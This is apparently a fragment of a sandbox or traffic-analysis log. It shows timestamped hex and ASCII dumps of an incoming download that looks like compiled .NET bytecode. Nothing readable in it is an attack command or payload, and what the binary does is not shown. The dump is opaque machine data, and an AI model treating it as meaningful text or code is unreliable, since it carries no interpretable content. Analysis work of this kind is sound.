2023-11-18 09:02:33 UTC	37	IN	Data Raw: 2c 13 02 7b d2 00 00 04 2c 0b 02 7b d2 00 00 04 6f 0a 05 00 06 02 28 74 01 00 06 02 7b d3 00 00 04 2d 01 2a 02 7b cc 00 00 04 7b 41 01 00 04 0a 02 7b d3 00 00 04 6f e3 00 00 0a 0c 2b 53 12 02 28 e4 00 00 0a 0d 09 2c 48 09 7b ec 02 00 04 13 04 11 04 2c 3c 06 09 6f e8 00 00 06 0b 07 16 fe 01 03 5f 2c 19 28 1a 00 00 06 20 7f d2 2d 00 32 0d 11 04 28 31 06 00 06 28 a9 05 00 06 0b 04 2d 10 07 2c 0d 07 06 6f e1 00 00 06 73 01 04 00 06 7a 12 02 28 e5 00 00 0a 2d a4 de 0e 12 02 fe 16 1d 00 00 1b 6f 45 00 00 0a dc 2a 00 00 01 10 00 00 02 00 43 00 60 a3 00 0e 00 00 00 00 1e 02 28 70 01 00 06 2a 36 02 28 70 01 00 06 02 7b d1 00 00 04 2a 3a 02 28 70 01 00 06 02 03 7d d1 00 00 04 2a 36 02 28 70 01 00 06 02 7b d0 00 00 04 2a 52 02 28 70 01 00 06 02 03 7d d0 00 00 04 02 Data Ascii: ,{,{o(t{-{{A{o+S(,H{,<o_,( -2(1(-,osz(-oEC`(p6(p{:(p}6(p{R(p}
2023-11-18 09:02:33 UTC	38	IN	Data Raw: 0c 01 00 0a 0a 03 6f 0a 01 00 0a 7e 0b 01 00 0a 6f 0c 01 00 0a 0b 03 6f 0d 01 00 0a 6f 0e 01 00 0a 0c 2b 27 08 6f 39 00 00 0a 74 55 00 00 01 0d 09 07 6f 0f 01 00 0a a5 b3 00 00 01 2d 0d 09 06 16 8c b3 00 00 01 6f 11 01 00 0a 08 6f 55 00 00 0a 2d d1 de 14 08 75 34 00 00 01 13 04 11 04 2c 07 11 04 6f 45 00 00 0a dc 03 6f 12 01 00 0a 2a 01 10 00 00 02 00 2e 00 33 61 00 14 00 00 00 00 1e 02 28 c3 00 00 0a 2a 1e 02 28 13 01 00 0a 2a 3a 02 28 c3 01 00 06 02 03 7d e8 00 00 04 2a 1e 02 7b e8 00 00 04 2a 22 02 03 7d e8 00 00 04 2a 92 02 28 c3 01 00 06 02 03 7d e9 00 00 04 02 04 7d ea 00 00 04 02 05 7d ec 00 00 04 02 0e 04 7d ed 00 00 04 2a 92 02 28 c3 01 00 06 02 03 7d e9 00 00 04 02 04 7d eb 00 00 04 02 05 7d ec 00 00 04 02 0e 04 7d ed 00 00 04 2a 1e 02 7b e9 00 Data Ascii: o~ooo+'o9tUo-ooU-u4,oEo.3a((:(}{"}(}}}}(}}}}{
2023-11-18 09:02:33 UTC	40	IN	Data Raw: 0c 02 7c 59 01 00 04 08 07 28 08 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 58 00 00 11 02 7b 59 01 00 04 0a 06 0b 07 03 28 17 01 00 0a 74 64 00 00 01 0c 02 7c 59 01 00 04 08 07 28 08 00 00 2b 0a 06 07 33 df 2a 1a 7e 2d 01 00 04 2a 42 02 28 fb 01 00 06 1b 28 77 00 00 0a 16 fe 01 2a 1a 7e 2f 01 00 04 2a 42 02 28 fd 01 00 06 1b 28 77 00 00 0a 16 fe 01 2a 3e 02 2d 06 7e 2e 01 00 04 2a 7e 30 01 00 04 2a 00 00 00 13 30 03 00 29 00 00 00 59 00 00 11 02 7b 61 01 00 04 0a 06 0b 07 03 28 15 01 00 0a 74 65 00 00 01 0c 02 7c 61 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 59 00 00 11 02 7b 61 01 00 04 0a 06 0b 07 03 28 17 01 00 0a 74 65 00 00 01 0c 02 7c 61 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 22 02 14 Data Ascii: \|Y(+30)X{Y(td\|Y(+3~-B((w~/B((w>-~.~00)Y{a(te\|a(+30)Y{a(te\|a(+3"
2023-11-18 09:02:33 UTC	41	IN	Data Raw: 00 00 0a 7a 03 2d 0b 72 af 1f 00 70 73 4a 00 00 0a 7a 03 7b 36 01 00 04 17 2e 10 72 c7 1f 00 70 72 af 1f 00 70 73 bc 00 00 0a 7a 04 2d 0b 72 0b 20 00 70 73 4a 00 00 0a 7a 05 2d 0b 72 31 11 00 70 73 4a 00 00 0a 7a 02 7b 41 01 00 04 0a 06 2d 0b 72 2b 20 00 70 73 bd 00 00 0a 7a 14 0b 06 03 04 05 6f 47 01 00 06 0b 16 0c 2b 35 0e 05 2c 1e 0e 05 02 05 03 04 0e 04 06 07 6f 49 01 00 06 06 07 6f 4a 01 00 06 08 6f fa 02 00 06 2c 20 08 2c 0c 0e 06 16 32 07 0e 06 28 6a 00 00 0a 0e 04 2c 0d 06 07 0e 04 12 02 6f 48 01 00 06 2d be de 39 0d 02 7b 46 01 00 04 28 3b 05 00 06 2c 1e 28 57 00 00 0a 72 7d 20 00 70 17 8d 1c 00 00 01 25 16 09 a2 28 40 05 00 06 28 b2 04 00 06 fe 1a 07 2c 07 06 07 6f 4b 01 00 06 dc 2a 01 1c 00 00 00 00 74 00 52 c6 00 2e 32 00 00 01 02 00 74 00 80 Data Ascii: z-rpsJz{6.rprpsz-r psJz-r1psJz{A-r+ pszoG+5,oIoJo, ,2(j,oH-9{F(;,(Wr} p%(@(,oK*tR.2t
2023-11-18 09:02:33 UTC	42	IN	Data Raw: 35 01 00 0a 0d 09 1f 27 35 0c 09 1f 22 2e 16 09 1f 27 2e 11 2b 3a 09 1f 3b 2e 0a 09 1f 3d 2e 18 09 1f 5c 33 2b 07 1f 5c 6f 53 00 00 0a 26 07 09 6f 53 00 00 0a 26 2b 20 03 2c 0a 07 09 6f 53 00 00 0a 26 2b 13 72 8b 22 00 70 73 ca 00 00 0a 7a 07 09 6f 53 00 00 0a 26 08 17 58 0c 08 06 32 9d 07 6f 56 00 00 0a 2a 00 00 1b 30 07 00 7c 00 00 00 61 00 00 11 02 2d 02 14 2a 73 4f 00 00 0a 0a 02 6f 36 01 00 0a 0b 2b 4d 07 6f 37 01 00 0a 0c 06 72 df 22 00 70 1a 8d 1c 00 00 01 25 16 12 02 28 38 01 00 0a 16 28 20 02 00 06 a2 25 17 1f 3d 8c d9 00 00 01 a2 25 18 12 02 28 39 01 00 0a 17 28 20 02 00 06 a2 25 19 1f 3b 8c d9 00 00 01 a2 6f 3a 01 00 0a 26 07 6f 55 00 00 0a 2d ab de 0a 07 2c 06 07 6f 45 00 00 0a dc 06 6f 56 00 00 0a 2a 01 10 00 00 02 00 12 00 59 6b 00 0a 00 00 Data Ascii: 5'5".'.+:;.=.\3+\oS&oS&+ ,oS&+r"pszoS&X2oV0\|a-sOo6+Mo7r"p%(8( %=%(9( %;o:&oU-,oEoV*Yk
2023-11-18 09:02:33 UTC	44	IN	Data Raw: 01 10 00 00 02 00 2e 00 8e bc 00 0a 00 00 00 00 5a 02 7b 41 01 00 04 2d 02 16 2a 02 7b 41 01 00 04 6f e4 00 00 06 2a 56 02 7b 41 01 00 04 2d 01 2a 02 7b 41 01 00 04 6f e3 00 00 06 2a 1a 28 0d 03 00 06 2a 36 02 28 24 02 00 06 02 7b 37 01 00 04 2a 96 02 28 24 02 00 06 03 2d 06 73 45 01 00 0a 7a 02 7b 36 01 00 04 2c 06 73 44 01 00 0a 7a 02 03 7d 37 01 00 04 2a 36 02 28 24 02 00 06 02 73 6c 01 00 06 2a 1e 02 28 37 02 00 06 2a 66 02 28 24 02 00 06 02 28 08 02 00 06 02 7b 46 01 00 04 03 73 20 08 00 06 2a 66 02 28 24 02 00 06 03 02 28 08 02 00 06 02 7b 46 01 00 04 73 3e 08 00 06 2a 6a 02 28 24 02 00 06 03 02 28 08 02 00 06 02 7b 46 01 00 04 04 73 3f 08 00 06 2a 6a 02 28 24 02 00 06 03 04 02 28 08 02 00 06 02 7b 46 01 00 04 73 48 08 00 06 2a 6e 02 28 24 02 00 06 Data Ascii: .Z{A-{AoV{A-{Ao(6(${7($-sEz{6,sDz}76($sl(7f($({Fs f($({Fs>j($({Fs?j($({FsH*n($
2023-11-18 09:02:33 UTC	45	IN	Data Raw: 00 00 00 1b 30 02 00 bc 00 00 00 6a 00 00 11 0f 02 28 6b 00 00 0a 2d 08 02 28 24 02 00 06 2b 10 02 7b 62 01 00 04 2c 08 0f 02 28 6d 00 00 0a 2a 03 16 2f 0b 72 04 28 00 70 73 ca 00 00 0a 7a 03 2d 04 16 0a 2b 12 03 1f 0a 5b 1f 64 28 4f 01 00 0a 0a 06 2d 03 1f 64 0a 28 b0 00 00 0a 0b 02 7b 3d 01 00 04 28 50 01 00 0a 0c 08 2c 0d 02 7b 3e 01 00 04 2d 05 17 13 06 de 4e de 11 08 2c 0d 02 7b 3d 01 00 04 28 60 00 00 0a 16 0c dc 06 2d 02 16 2a 28 b0 00 00 0a 0d 12 03 07 28 88 00 00 0a 13 04 12 04 28 51 01 00 0a 13 05 11 05 23 00 00 00 00 00 00 00 00 32 06 11 05 03 6c 37 02 16 2a 06 28 6a 00 00 0a 2b 96 11 06 2a 01 10 00 00 02 00 5b 00 12 6d 00 11 00 00 00 00 13 30 04 00 51 00 00 00 0f 00 00 11 03 28 6f 00 00 0a 2c 02 04 2a 02 03 12 00 6f 52 01 00 0a 2c 02 06 2a 02 Data Ascii: 0j(k-($+{b,(m/r(psz-+[d(O-d({=(P,{>-N,{=(`-(((Q#2l7(j+[m0Q(o,oR,
2023-11-18 09:02:33 UTC	46	IN	Data Raw: 1f 02 00 06 0a 06 72 94 2c 00 70 14 28 49 02 00 06 0b 07 2c 14 d0 0b 00 00 02 28 3e 00 00 0a 07 17 28 4a 02 00 06 0c 2b 02 14 0c 06 72 a0 2c 00 70 16 13 0b 12 0b 28 3b 01 00 0a 28 49 02 00 06 28 86 03 00 06 0d 08 75 0b 00 00 02 2c 15 02 02 7b 46 01 00 04 08 a5 0b 00 00 02 60 7d 46 01 00 04 2b 15 09 2d 12 02 02 7b 46 01 00 04 28 85 02 00 06 60 7d 46 01 00 04 06 72 be 2c 00 70 16 13 0b 12 0b 28 3b 01 00 0a 28 49 02 00 06 28 86 03 00 06 2d 33 7e 32 01 00 04 13 0c 16 13 0b 11 0c 12 0b 28 5f 00 00 0a 02 02 7b 46 01 00 04 7e 34 01 00 04 60 7d 46 01 00 04 de 0c 11 0b 2c 07 11 0c 28 60 00 00 0a dc 02 7b 46 01 00 04 21 00 00 00 00 00 00 01 00 28 36 05 00 06 13 04 06 13 05 02 7b 37 01 00 04 13 06 11 04 39 90 00 00 00 28 46 01 00 0a 73 47 01 00 0a 13 05 06 6f 36 01 Data Ascii: r,p(I,(>(J+r,p(;(I(u,{F`}F+-{F(`}Fr,p(;(I(-3~2(_{F~4`}F,(`{F!(6{79(FsGo6
2023-11-18 09:02:33 UTC	48	IN	Data Raw: 00 06 2c 0f 11 14 17 60 13 14 11 14 1f fb 5f 13 14 2b 06 11 14 18 60 13 14 11 08 2c 07 11 14 1f 40 60 13 14 02 7b 41 01 00 04 11 09 02 7b 4a 01 00 04 02 7b 46 01 00 04 11 14 11 12 11 11 6f de 00 00 06 06 72 de 31 00 70 14 28 49 02 00 06 0b 07 2c 0c 02 07 28 86 03 00 06 7d 51 01 00 04 06 72 04 2d 00 70 14 28 49 02 00 06 13 15 11 15 2c 35 28 92 00 00 0a 11 15 6f 95 00 00 0a 13 17 12 17 11 17 8e 69 17 58 28 0a 00 00 2b 02 7b 41 01 00 04 11 17 17 6f 36 01 00 06 02 17 7d 44 01 00 04 38 b7 00 00 00 06 72 ec 2c 00 70 14 28 49 02 00 06 13 18 11 18 2c 49 14 13 19 11 18 12 19 28 54 02 00 06 13 1a 11 1a 2d 20 28 57 00 00 0a 72 f4 31 00 70 17 8d 1c 00 00 01 25 16 11 19 a2 28 40 05 00 06 73 5d 01 00 0a 7a 02 7b 41 01 00 04 11 1a 16 6f 36 01 00 06 02 16 7d 44 01 00 04 Data Ascii: ,`_+`,@`{A{J{For1p(I,(}Qr-p(I,5(oiX(+{Ao6}D8r,p(I,I(T- (Wr1p%(@s]z{Ao6}D
2023-11-18 09:02:33 UTC	49	IN	Data Raw: 02 7b 5b 01 00 04 6f 39 01 00 06 02 7b 55 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 5c 01 00 04 6f 3a 01 00 06 02 7b 57 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 5e 01 00 04 6f 3c 01 00 06 02 7b 56 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 5d 01 00 04 6f 3b 01 00 06 02 7b 59 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 60 01 00 04 6f 3f 01 00 06 28 61 01 00 0a 13 1e 11 1e 14 28 4e 01 00 0a 2c 24 06 72 30 35 00 70 17 13 0b 12 0b 28 3b 01 00 0a 28 49 02 00 06 28 86 03 00 06 2c 08 02 11 1e 6f 62 01 00 0a 02 11 16 7d 36 01 00 04 14 13 1f 02 17 12 1f 28 28 02 00 06 02 19 11 1f 14 14 14 14 11 06 17 8d 1c 00 00 01 25 16 11 05 a2 73 e6 01 00 06 28 09 02 00 06 de 0b 26 02 11 16 7d 36 01 00 04 fe 1a de 09 26 02 6f 3e 01 00 0a fe 1a 2a 41 7c 00 00 02 00 00 00 e0 00 00 00 1d 00 00 Data Ascii: {[o9{U,{A{\o:{W,{A{^o<{V,{A{]o;{Y,{A{`o?(a(N,$r05p(;(I(,ob}6((%s(&}6&o>*A\|
2023-11-18 09:02:33 UTC	50	IN	Data Raw: 06 72 c8 39 00 70 0a 07 2d 06 72 1a 3a 00 70 0b 28 71 00 00 0a 72 4a 3a 00 70 18 8d 1c 00 00 01 25 16 06 a2 25 17 07 a2 28 40 05 00 06 2a 14 2a 6a 7e 35 01 00 04 2d 05 04 03 51 16 2a 7e 35 01 00 04 02 03 04 6f 11 02 00 06 2a 56 7e 35 01 00 04 2d 01 2a 7e 35 01 00 04 02 03 6f 12 02 00 06 2a 00 00 13 30 03 00 5d 00 00 00 6f 00 00 11 72 5a 3a 00 70 0a 06 14 12 01 28 83 02 00 06 2d 0f 06 14 28 5c 05 00 06 0b 06 07 28 84 02 00 06 07 2d 0a 21 08 40 00 00 00 0c 00 00 2a d0 0b 00 00 02 28 3e 00 00 0a 07 6f 56 00 00 0a 17 28 4a 02 00 06 0c 08 75 0b 00 00 02 2c 07 08 a5 0b 00 00 02 2a 21 08 40 00 00 00 0c 00 00 2a 00 00 00 1b 30 02 00 24 00 00 00 70 00 00 11 7e 32 01 00 04 0a 16 0b 06 12 01 28 5f 00 00 0a 7e 34 01 00 04 0c de 0a 07 2c 06 06 28 60 00 00 0a dc 08 2a Data Ascii: r9p-r:p(qrJ:p%%(@*j~5-Q~5oV~5-~5o0]orZ:p(-(\(-!@(>oV(Ju,!@0$p~2(_~4,(`*
2023-11-18 09:02:33 UTC	52	IN	Data Raw: 72 d2 3e 00 70 28 74 00 00 0a 17 6f 74 01 00 0a 10 00 02 72 d2 3e 00 70 28 74 00 00 0a 6f 7a 00 00 0a 28 75 01 00 0a 10 00 03 2c 08 02 28 76 01 00 0a 10 00 02 2a 4e 02 28 24 02 00 06 02 72 f2 3e 00 70 14 6f 77 01 00 0a 2a 52 02 28 24 02 00 06 02 03 16 8d bd 00 00 01 6f 77 01 00 0a 2a 00 00 00 13 30 06 00 e9 02 00 00 72 00 00 11 02 28 24 02 00 06 02 7b 36 01 00 04 17 2e 06 73 44 01 00 0a 7a 1b 8d bd 00 00 01 0a 04 2d 08 16 8d bd 00 00 01 10 02 04 06 16 6f 78 01 00 0a 03 28 71 00 00 0a 6f 79 01 00 0a 0b 07 28 86 08 00 06 0c 08 20 9d 2a 5e 75 35 69 08 20 db c1 31 2e 35 26 08 20 c6 75 57 1a 3b 4f 01 00 00 08 20 1a b0 7a 2c 3b 05 01 00 00 08 20 db c1 31 2e 3b 0f 01 00 00 38 6b 02 00 00 08 20 f1 68 01 33 35 1b 08 20 9c a9 d9 32 3b cd 00 00 00 08 20 f1 68 01 33 Data Ascii: r>p(totr>p(toz(u,(vN($r>powR($ow0r(${6.sDz-ox(qoy( ^u5i 1.5& uW;O z,; 1.;8k h35 2; h3
2023-11-18 09:02:33 UTC	53	IN	Data Raw: 0a 7e 8a 01 00 0a d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 8b 01 00 0a d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 8c 01 00 0a d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 8d 01 00 0a d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 8e 01 00 0a d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 8f 01 00 0a d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 90 01 00 0a d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 91 01 00 0a d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 92 01 00 0a d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 7e 93 01 00 0a d0 b5 00 00 01 28 Data Ascii: ~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(>o\|&o~(
2023-11-18 09:02:33 UTC	54	IN	Data Raw: 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 75 47 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 91 47 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 7d 01 00 0a 03 28 6f 00 00 0a 2c 07 28 fb 01 00 06 10 01 03 28 fe 01 00 06 28 ff 01 00 06 0c 28 71 00 00 0a 72 9f 47 00 70 18 8d 1c 00 00 01 25 16 03 a2 25 17 08 a2 28 40 05 00 06 02 73 6b 01 00 06 0d 09 6f 92 01 00 06 13 04 38 ba 02 00 00 04 28 6f 00 00 0a 2d 14 04 11 04 18 6f 98 01 00 0a 1b 28 77 00 00 0a 3a 9e 02 00 00 00 28 71 00 00 0a 72 34 48 00 70 18 8d 1c 00 00 01 25 16 03 a2 25 17 11 04 18 6f 98 01 00 0a a2 28 40 05 00 06 02 73 6b 01 00 06 13 05 11 05 18 6f 91 01 00 06 13 06 11 06 17 17 6f ee 03 00 06 13 07 11 07 6f 0d 01 00 0a 6f 0e 01 00 0a 13 08 38 f7 01 00 00 11 Data Ascii: \|&oruGp(>o\|&orGp(>o\|&o}(o,((((qrGp%%(@sko8(o-o(w:(qr4Hp%%o(@skoooo8
2023-11-18 09:02:33 UTC	56	IN	Data Raw: 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 18 49 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 30 49 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 4a 49 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 56 49 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 74 49 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 8c 49 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 99 44 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 4d 44 00 70 d0 bd 00 00 01 28 Data Ascii: \|&orIp(>o\|&or0Ip(>o\|&orJIp(>o\|&orVIp(>o\|&ortIp(>o\|&orIp(>o\|&orDp(>o\|&orMDp(
2023-11-18 09:02:34 UTC	56	IN	Data Raw: 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 65 44 00 70 d0 5e 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 7d 44 00 70 d0 c3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 aa 49 00 70 d0 d0 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 be 49 00 70 d0 5d 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 d6 49 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 e2 49 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 04 4a 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 1a 4a 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 7d 01 00 0a 03 28 6f 00 00 0a 2c 07 28 fb 01 00 06 10 01 03 28 fe 01 00 06 28 ff Data Ascii: >o\|&oreDp^(>o\|&or}Dp(>o\|&orIp(>o\|&orIp](>o\|&orIp(>o\|&orIp(>o\|&orJp(>o\|&orJp(>o\|&o}(o,(((
2023-11-18 09:02:34 UTC	57	IN	Data Raw: 00 00 00 00 00 00 00 02 00 00 00 81 03 00 00 53 00 00 00 d4 03 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 55 03 00 00 8d 00 00 00 e2 03 00 00 03 00 00 00 4c 00 00 02 02 00 00 00 bb 05 00 00 2c 00 00 00 e7 05 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 b2 05 00 00 43 00 00 00 f5 05 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 67 06 00 00 4c 00 00 00 b3 06 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 5e 06 00 00 63 00 00 00 c1 06 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 dd 04 00 00 0a 02 00 00 e7 06 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 d4 04 00 00 21 02 00 00 f5 06 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 a8 04 00 00 5b 02 00 00 03 07 00 00 03 00 00 00 4c 00 00 02 02 00 00 00 2b 03 00 00 e9 03 00 00 14 07 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 22 03 00 00 Data Ascii: SUL,CgL^c![L+"
2023-11-18 09:02:34 UTC	59	IN	Data Raw: 06 6f 0a 01 00 0a 72 01 44 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 1d 44 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 37 44 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 ef 4e 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 0f 4f 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 29 4f 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 33 47 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 43 4f 00 70 d0 2c 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 5d 4f 00 70 d0 2c 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 7d 01 00 0a 03 28 6f 00 00 0a Data Ascii: orDp(>o\|&orDp(>o\|&or7Dp(>o\|&orNp(>o\|&orOp(>o\|&or)Op(>o\|&or3Gp(>o\|&orCOp,(>o\|&or]Op,(>o\|&o}(o
2023-11-18 09:02:34 UTC	60	IN	Data Raw: 0a 26 25 6f 0a 01 00 0a 72 11 52 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 0a 01 00 0a 72 2d 52 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 0a 01 00 0a 72 49 52 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 0a 01 00 0a 72 5f 52 00 70 d0 d0 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 0a 01 00 0a 72 79 52 00 70 d0 d0 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 0a 01 00 0a 72 93 52 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 7d 01 00 0a 28 44 06 00 06 73 83 01 00 0a 0a 25 06 6f 84 01 00 0a 26 06 6f 85 01 00 0a 25 6f 12 01 00 0a 25 6f 82 01 00 0a 2a 00 1b 30 09 00 d6 05 00 00 7c 00 00 11 72 b7 52 00 70 73 7a 01 00 0a 0a 73 b0 01 00 0a 0c 06 28 71 00 00 0a 6f 7b 01 00 0a 06 6f 0a 01 00 0a Data Ascii: &%orRp(>o\|&%or-Rp(>o\|&%orIRp(>o\|&%or_Rp(>o\|&%oryRp(>o\|&%orRp(>o\|&%o}(Ds%o&o%o%o*0\|rRpszs(qo{o
2023-11-18 09:02:34 UTC	61	IN	Data Raw: 07 72 37 44 00 70 11 0b 18 6f 98 01 00 0a 6f 9b 01 00 0a 07 72 4d 44 00 70 11 0f 6f 9b 01 00 0a 07 72 e4 48 00 70 11 0b 17 6f 98 01 00 0a 6f 9b 01 00 0a 07 72 99 44 00 70 11 0c 8c b5 00 00 01 6f 9b 01 00 0a 14 13 10 16 13 11 16 13 12 11 0f 2c 1c 02 7b 41 01 00 04 03 11 0b 17 6f 98 01 00 0a 11 0f 12 11 12 12 12 10 6f 03 01 00 06 11 10 28 6f 00 00 0a 2d 0d 07 72 df 46 00 70 11 10 6f 9b 01 00 0a 07 72 3b 53 00 70 11 11 2c 07 72 22 54 00 70 2b 05 72 7d 53 00 70 6f 9b 01 00 0a 07 72 4f 53 00 70 11 12 8c b5 00 00 01 6f 9b 01 00 0a 11 0c 17 58 13 0c 0e 04 2c 0c 0e 04 11 0f 1b 28 77 00 00 0a 2d 0c 06 6f 0d 01 00 0a 07 6f 81 01 00 0a 11 0e 6f a7 00 00 0a 3a d8 fe ff ff de 0c 11 0e 2c 07 11 0e 6f 45 00 00 0a dc de 0c 11 0d 2c 07 11 0d 6f 45 00 00 0a dc de 03 26 de Data Ascii: r7DpoorMDporHpoorDpo,{Aoo(o-rFpor;Sp,r"Tp+r}SporOSpoX,(w-ooo:,oE,oE&
2023-11-18 09:02:34 UTC	63	IN	Data Raw: 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 03 28 6f 00 00 0a 2c 07 28 fb 01 00 06 10 01 03 28 fe 01 00 06 28 ff 01 00 06 13 06 06 6f 7d 01 00 0a 28 71 00 00 0a 72 79 4f 00 70 18 8d 1c 00 00 01 25 16 03 a2 25 17 11 06 a2 28 40 05 00 06 02 73 6b 01 00 06 13 07 11 07 6f 92 01 00 06 13 08 38 4b 03 00 00 04 28 6f 00 00 0a 2d 14 04 11 08 18 6f 98 01 00 0a 1b 28 77 00 00 0a 3a 2f 03 00 00 28 71 00 00 0a 72 34 48 00 70 18 8d 1c 00 00 01 25 16 03 a2 25 17 11 08 18 6f 98 01 00 0a a2 28 40 05 00 06 02 73 6b 01 00 06 13 09 11 08 1a 6f 98 01 00 0a 1f 0d 1f 20 6f ad 01 00 0a 1f 0a 1f 20 6f ad 01 00 0a 1f 09 1f 20 6f ad 01 00 0a 0c 28 71 00 00 0a 6f ae 01 00 0a 08 72 df 4f 00 70 17 6f af 01 00 0a 0d 09 16 2f 05 dd bf 02 00 00 08 09 1a 58 6f 7a 00 00 0a 0c 08 02 73 6b 01 00 Data Ascii: (>o\|&(o,(((o}(qryOp%%(@sko8K(o-o(w:/(qr4Hp%%o(@sko o o o(qorOpo/Xozsk
2023-11-18 09:02:34 UTC	64	IN	Data Raw: 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 c4 54 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 e4 54 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 00 55 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 26 55 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 36 55 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 58 55 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 8e 55 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 ae 55 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 cc 55 00 70 d0 bd 00 00 01 